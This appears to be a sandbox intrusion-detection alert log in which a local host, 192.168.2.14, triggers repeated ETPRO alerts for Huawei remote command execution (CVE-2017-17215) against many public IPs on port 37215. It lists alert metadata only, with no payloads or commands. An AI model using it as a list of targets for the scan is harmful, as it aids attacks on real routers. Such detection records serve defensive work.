                                                        06/13/24-21:32:54.710092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5835837215192.168.2.14156.232.235.124
                                                        06/13/24-21:32:34.193836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3786637215192.168.2.1441.47.55.164
                                                        06/13/24-21:32:52.679837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5698637215192.168.2.14156.159.156.148
                                                        06/13/24-21:33:09.090763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352037215192.168.2.14197.57.59.139
                                                        06/13/24-21:32:09.440382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4371237215192.168.2.14156.200.44.219
                                                        06/13/24-21:32:25.991111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240037215192.168.2.14156.34.107.117
                                                        06/13/24-21:33:07.039876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4319437215192.168.2.14197.89.130.246
                                                        06/13/24-21:33:15.257463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4214237215192.168.2.14156.97.128.61
                                                        06/13/24-21:32:09.457777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4070837215192.168.2.14197.255.4.189
                                                        06/13/24-21:32:56.754652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243837215192.168.2.14197.165.143.204
                                                        06/13/24-21:32:44.454181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4982037215192.168.2.14197.180.167.115
                                                        06/13/24-21:32:38.304537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4535037215192.168.2.14156.56.181.222
                                                        06/13/24-21:33:13.212207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3746637215192.168.2.14197.124.119.11
                                                        06/13/24-21:32:19.730152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3657437215192.168.2.14197.72.114.137
                                                        06/13/24-21:32:23.941278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5018037215192.168.2.14156.225.215.92
                                                        06/13/24-21:32:36.268235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4217837215192.168.2.1441.37.141.228
                                                        06/13/24-21:32:40.373392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710837215192.168.2.14156.176.103.142
                                                        06/13/24-21:33:04.993784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3540437215192.168.2.14156.29.139.134
                                                        06/13/24-21:32:15.632568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738037215192.168.2.1441.171.53.13
                                                        06/13/24-21:32:25.971034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300437215192.168.2.1441.231.150.86
                                                        06/13/24-21:32:21.782429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4970437215192.168.2.14197.191.171.138
                                                        06/13/24-21:31:57.092593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3536437215192.168.2.1441.29.87.94
                                                        06/13/24-21:32:42.424593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5865037215192.168.2.14156.36.181.46
                                                        06/13/24-21:33:07.059662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5331037215192.168.2.14156.23.119.208
                                                        06/13/24-21:32:01.238906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3518637215192.168.2.14197.23.17.96
                                                        06/13/24-21:32:40.380493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5363037215192.168.2.14197.130.90.216
                                                        06/13/24-21:32:09.458068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5385437215192.168.2.1441.206.112.91
                                                        06/13/24-21:32:30.126249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3523837215192.168.2.14197.17.219.12
                                                        06/13/24-21:32:54.711454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5311437215192.168.2.14156.17.65.147
                                                        06/13/24-21:32:38.315847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5002037215192.168.2.14197.204.179.199
                                                        06/13/24-21:32:38.297641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3481837215192.168.2.1441.45.75.223
                                                        06/13/24-21:32:23.832726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5333237215192.168.2.14197.204.116.212
                                                        06/13/24-21:32:17.694983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4667037215192.168.2.1441.16.84.109
                                                        06/13/24-21:32:56.758360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674837215192.168.2.14156.3.8.53
                                                        06/13/24-21:32:40.379641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3571837215192.168.2.14197.201.218.165
                                                        06/13/24-21:33:09.106783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4971237215192.168.2.14197.214.111.222
                                                        06/13/24-21:32:44.450849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705437215192.168.2.1441.151.77.246
                                                        06/13/24-21:32:36.265932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5844637215192.168.2.14197.77.6.253
                                                        06/13/24-21:32:40.375066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3675837215192.168.2.14156.146.222.74
                                                        06/13/24-21:32:38.298630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5788437215192.168.2.14197.47.201.115
                                                        06/13/24-21:32:44.474109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505637215192.168.2.14156.237.148.78
                                                        06/13/24-21:32:28.028125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5305037215192.168.2.14156.123.97.30
                                                        06/13/24-21:33:00.886283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4194637215192.168.2.14197.210.35.192
                                                        06/13/24-21:33:02.912084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4732637215192.168.2.1441.113.108.253
                                                        06/13/24-21:33:04.989897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6046837215192.168.2.14156.90.20.117
                                                        06/13/24-21:32:01.223413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4704637215192.168.2.14197.181.148.127
                                                        06/13/24-21:32:15.608507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264037215192.168.2.14156.22.231.210
                                                        06/13/24-21:32:07.403559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5073237215192.168.2.1441.191.64.142
                                                        06/13/24-21:32:13.544208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3958837215192.168.2.14197.60.182.167
                                                        06/13/24-21:32:48.569006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793837215192.168.2.14197.21.203.183
                                                        06/13/24-21:32:54.726310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4198837215192.168.2.14156.28.17.14
                                                        06/13/24-21:32:42.418245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674637215192.168.2.14197.121.194.182
                                                        06/13/24-21:32:19.729387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4035037215192.168.2.14156.155.170.33
                                                        06/13/24-21:32:30.123412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729437215192.168.2.1441.140.23.211
                                                        06/13/24-21:33:15.273144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660237215192.168.2.1441.73.108.168
                                                        06/13/24-21:32:54.711043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4342637215192.168.2.14156.148.177.211
                                                        06/13/24-21:33:09.102419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5337437215192.168.2.14156.129.58.189
                                                        06/13/24-21:33:05.014912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755837215192.168.2.14156.206.232.222
                                                        06/13/24-21:32:38.301564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4342637215192.168.2.14197.34.235.89
                                                        06/13/24-21:32:58.838192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4589637215192.168.2.14197.77.119.15
                                                        06/13/24-21:32:03.294385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172237215192.168.2.1441.200.26.96
                                                        06/13/24-21:32:13.546907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762237215192.168.2.1441.102.72.76
                                                        06/13/24-21:33:15.274009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5034037215192.168.2.1441.130.98.16
                                                        06/13/24-21:32:17.675331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5540637215192.168.2.14197.167.148.224
                                                        06/13/24-21:33:13.214577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6052037215192.168.2.14156.219.3.31
                                                        06/13/24-21:32:42.423181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5380837215192.168.2.14156.36.157.111
                                                        06/13/24-21:32:11.485370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4211237215192.168.2.1441.204.64.240
                                                        06/13/24-21:32:30.097627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5350037215192.168.2.1441.27.201.138
                                                        06/13/24-21:32:28.046271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4121237215192.168.2.14156.76.207.74
                                                        06/13/24-21:32:21.801945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4308837215192.168.2.1441.223.100.148
                                                        06/13/24-21:33:00.888071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492037215192.168.2.14156.33.52.183
                                                        06/13/24-21:32:54.707910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4230637215192.168.2.1441.127.136.101
                                                        06/13/24-21:33:09.111578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564437215192.168.2.14156.159.6.150
                                                        06/13/24-21:32:52.669606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3648837215192.168.2.14156.203.24.246
                                                        06/13/24-21:32:03.306269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4656437215192.168.2.14156.114.244.226
                                                        06/13/24-21:32:17.695271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912837215192.168.2.1441.72.204.156
                                                        06/13/24-21:31:59.176152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3925037215192.168.2.1441.15.178.30
                                                        06/13/24-21:32:21.805219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695037215192.168.2.14156.91.118.130
                                                        06/13/24-21:32:40.375780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669637215192.168.2.1441.69.104.35
                                                        06/13/24-21:31:57.153010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5807237215192.168.2.14197.247.104.150
                                                        06/13/24-21:32:03.277920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4768637215192.168.2.14197.248.245.187
                                                        06/13/24-21:32:23.836540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3493637215192.168.2.14156.12.129.83
                                                        06/13/24-21:33:00.886658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4252037215192.168.2.14197.62.17.79
                                                        06/13/24-21:32:58.843800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3382037215192.168.2.14197.53.210.25
                                                        06/13/24-21:32:30.076033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5212637215192.168.2.1441.203.87.178
                                                        06/13/24-21:32:28.043531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4695037215192.168.2.14156.77.216.74
                                                        06/13/24-21:32:03.300562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4407837215192.168.2.14156.157.209.9
                                                        06/13/24-21:32:34.194534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4718437215192.168.2.14197.198.46.207
                                                        06/13/24-21:32:50.632907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5914637215192.168.2.14197.89.93.235
                                                        06/13/24-21:32:07.420311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4706837215192.168.2.1441.254.15.151
                                                        06/13/24-21:32:05.377769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999837215192.168.2.14197.5.240.217
                                                        06/13/24-21:32:28.043948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652437215192.168.2.1441.68.138.109
                                                        06/13/24-21:32:42.408142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912037215192.168.2.1441.16.69.247
                                                        06/13/24-21:32:05.344023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3346037215192.168.2.1441.82.241.103
                                                        06/13/24-21:32:05.349673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852237215192.168.2.14197.57.37.89
                                                        06/13/24-21:32:21.783985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3839837215192.168.2.1441.194.113.152
                                                        06/13/24-21:32:58.822822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297237215192.168.2.14197.7.166.192
                                                        06/13/24-21:32:05.344952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578437215192.168.2.1441.119.106.247
                                                        06/13/24-21:32:48.552629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5516637215192.168.2.14197.189.252.218
                                                        06/13/24-21:32:50.630956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5369037215192.168.2.14156.190.124.205
                                                        06/13/24-21:32:19.731728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5022837215192.168.2.1441.57.103.164
                                                        06/13/24-21:33:17.310010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3410437215192.168.2.14156.92.155.233
                                                        06/13/24-21:32:32.165568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4593237215192.168.2.1441.147.236.73
                                                        06/13/24-21:33:02.936581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3475837215192.168.2.14156.183.200.112
                                                        06/13/24-21:33:09.089078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5553037215192.168.2.1441.136.29.82
                                                        06/13/24-21:32:17.678815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4746637215192.168.2.14197.235.91.245
                                                        06/13/24-21:32:48.568352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4904037215192.168.2.14197.92.204.56
                                                        06/13/24-21:32:56.783627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5638037215192.168.2.1441.229.83.59
                                                        06/13/24-21:32:42.418865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4127437215192.168.2.14156.35.48.184
                                                        06/13/24-21:32:58.822109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809837215192.168.2.14197.215.15.177
                                                        06/13/24-21:33:00.868549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4527637215192.168.2.14156.150.104.251
                                                        06/13/24-21:32:30.076411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3958837215192.168.2.1441.250.71.218
                                                        06/13/24-21:32:34.196464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4695637215192.168.2.1441.135.4.0
                                                        06/13/24-21:32:13.565231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4094437215192.168.2.14197.51.85.55
                                                        06/13/24-21:32:21.784496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4280837215192.168.2.14197.66.196.168
                                                        06/13/24-21:32:38.298952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4586437215192.168.2.14156.106.136.29
                                                        06/13/24-21:32:05.376218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3733437215192.168.2.14156.121.137.185
                                                        06/13/24-21:33:13.232021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734237215192.168.2.14197.54.194.43
                                                        06/13/24-21:32:50.611048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362637215192.168.2.14156.126.219.70
                                                        06/13/24-21:32:48.553984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299837215192.168.2.1441.44.60.87
                                                        06/13/24-21:33:15.258841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3377037215192.168.2.14197.152.49.146
                                                        06/13/24-21:32:54.708713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4953037215192.168.2.1441.81.18.217
                                                        06/13/24-21:31:57.093325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5756037215192.168.2.1441.56.243.110
                                                        06/13/24-21:33:04.993459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3361637215192.168.2.1441.6.191.186
                                                        06/13/24-21:32:17.695790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4723237215192.168.2.14156.69.172.152
                                                        06/13/24-21:31:57.091563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6074037215192.168.2.14197.241.131.120
                                                        06/13/24-21:33:09.101674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5460637215192.168.2.14197.118.85.118
                                                        06/13/24-21:32:07.401874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5119437215192.168.2.14197.91.254.143
                                                        06/13/24-21:32:54.711537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3350437215192.168.2.1441.246.171.155
                                                        06/13/24-21:32:54.709644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3878037215192.168.2.1441.101.140.88
                                                        06/13/24-21:33:11.154928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4261437215192.168.2.14156.171.133.39
                                                        06/13/24-21:32:25.968879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3663837215192.168.2.14197.241.167.47
                                                        06/13/24-21:32:09.457667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3406637215192.168.2.1441.37.45.70
                                                        06/13/24-21:32:44.452956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3839637215192.168.2.14156.251.226.251
                                                        06/13/24-21:32:05.377715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5934837215192.168.2.14197.68.174.112
                                                        06/13/24-21:32:28.027041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287637215192.168.2.14197.132.169.223
                                                        06/13/24-21:32:30.100577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6035237215192.168.2.1441.42.21.187
                                                        06/13/24-21:32:03.308266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4054237215192.168.2.14197.94.22.210
                                                        06/13/24-21:32:50.612465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3416637215192.168.2.1441.103.123.188
                                                        06/13/24-21:32:46.503138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3960037215192.168.2.14156.61.187.93
                                                        06/13/24-21:32:58.838385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4585037215192.168.2.14156.31.207.250
                                                        06/13/24-21:32:17.672785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892037215192.168.2.1441.190.110.24
                                                        06/13/24-21:32:30.073752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519437215192.168.2.1441.101.159.43
                                                        06/13/24-21:32:36.267309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4547437215192.168.2.14156.112.101.208
                                                        06/13/24-21:32:36.245389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3524437215192.168.2.1441.211.111.138
                                                        06/13/24-21:32:07.402963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5955437215192.168.2.14197.165.235.73
                                                        06/13/24-21:32:40.374551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5344637215192.168.2.14156.13.190.60
                                                        06/13/24-21:32:21.802436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283037215192.168.2.14197.221.142.234
                                                        06/13/24-21:33:04.993193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754037215192.168.2.1441.249.150.157
                                                        06/13/24-21:33:00.868403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4700037215192.168.2.1441.247.75.246
                                                        06/13/24-21:32:28.024615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5734037215192.168.2.14156.142.154.254
                                                        06/13/24-21:32:28.024258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4213637215192.168.2.14156.93.97.95
                                                        06/13/24-21:32:03.297398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3311437215192.168.2.14197.147.57.78
                                                        06/13/24-21:33:07.041593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3990637215192.168.2.1441.98.127.110
                                                        06/13/24-21:32:23.941491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5161237215192.168.2.14197.175.157.211
                                                        06/13/24-21:32:54.709918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030437215192.168.2.14156.80.141.226
                                                        06/13/24-21:32:40.372891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4804237215192.168.2.14156.91.74.239
                                                        06/13/24-21:32:03.275513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3516437215192.168.2.14197.144.49.247
                                                        06/13/24-21:32:48.568166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5214437215192.168.2.1441.88.166.117
                                                        06/13/24-21:32:21.800923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4529837215192.168.2.14156.172.59.19
                                                        06/13/24-21:32:30.075000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786437215192.168.2.1441.197.247.247
                                                        06/13/24-21:32:17.674697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4089037215192.168.2.14197.83.94.31
                                                        06/13/24-21:32:30.124946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5492237215192.168.2.14156.170.37.19
                                                        06/13/24-21:33:07.041511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3698037215192.168.2.14156.128.50.13
                                                        06/13/24-21:32:19.731171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5470437215192.168.2.14197.118.192.242
                                                        06/13/24-21:32:21.782042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3962637215192.168.2.1441.67.22.50
                                                        06/13/24-21:32:05.349281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5262037215192.168.2.14156.64.69.159
                                                        06/13/24-21:32:07.402575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5513037215192.168.2.1441.63.55.8
                                                        06/13/24-21:33:13.227718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3547637215192.168.2.14197.14.250.81
                                                        06/13/24-21:32:03.307743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3405637215192.168.2.14197.11.243.135
                                                        06/13/24-21:32:11.488574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886037215192.168.2.14156.217.211.68
                                                        06/13/24-21:32:09.458938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3493637215192.168.2.1441.83.112.53
                                                        06/13/24-21:32:09.437051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5477037215192.168.2.1441.46.136.150
                                                        06/13/24-21:32:40.359597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3380437215192.168.2.1441.22.170.55
                                                        06/13/24-21:32:46.528524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199837215192.168.2.14156.164.83.42
                                                        06/13/24-21:32:48.553507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5203037215192.168.2.14156.207.70.157
                                                        06/13/24-21:32:34.218091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5499837215192.168.2.14197.202.30.7
                                                        06/13/24-21:33:15.257762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4779437215192.168.2.14197.80.56.242
                                                        06/13/24-21:33:05.011269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101837215192.168.2.14156.85.230.199
                                                        06/13/24-21:32:23.832679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5901437215192.168.2.14197.235.42.211
                                                        06/13/24-21:33:02.911017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4794037215192.168.2.14197.25.33.113
                                                        06/13/24-21:32:28.025943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3675637215192.168.2.1441.199.135.117
                                                        06/13/24-21:33:02.937248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4957037215192.168.2.14156.234.236.218
                                                        06/13/24-21:32:48.549866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4688037215192.168.2.14156.100.224.236
                                                        06/13/24-21:32:23.929671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6011037215192.168.2.14156.176.169.168
                                                        06/13/24-21:32:46.527617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5033437215192.168.2.14197.186.139.151
